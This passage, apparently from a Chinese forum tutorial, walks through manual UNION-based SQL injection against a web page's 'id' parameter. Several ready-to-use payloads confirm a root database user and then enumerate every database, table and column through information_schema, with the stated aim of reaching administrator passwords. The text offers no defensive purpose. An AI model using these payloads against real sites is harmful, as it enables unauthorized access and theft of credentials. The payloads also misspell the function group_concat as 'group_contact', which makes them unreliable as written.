我们通过xxxx/?id=-1 union select 1,user(),3 查到了当前的注入点是root用户,如图2所示,那么我们就可以进行跨库注入
通过命名xxx/?id=-1 union select 1,group_contact(schema_name),3 from information_schema.schemata
来查询information-schema数据库下tables中的全部数据,也就是全部数据库表名,得到结果,有以上数据库。如图3
这就是所有数据库,接下来我们可以通过数据库名,结合上一帖子中的查询方法,查到任何一个数据库中的信息,包括管理员账号密码
xxx/?id=-1 union select 1,group_contact(table_name),3 from information_schema.tables where table_schema='test'
查询test库下的全部表名
xxx/?id=-1 union select 1,group_contact(column_name),3 from information_schema.columns where table_schema='test'
查询test库下全部列名,诸如此类语句可以自己构建[呼~][呼~]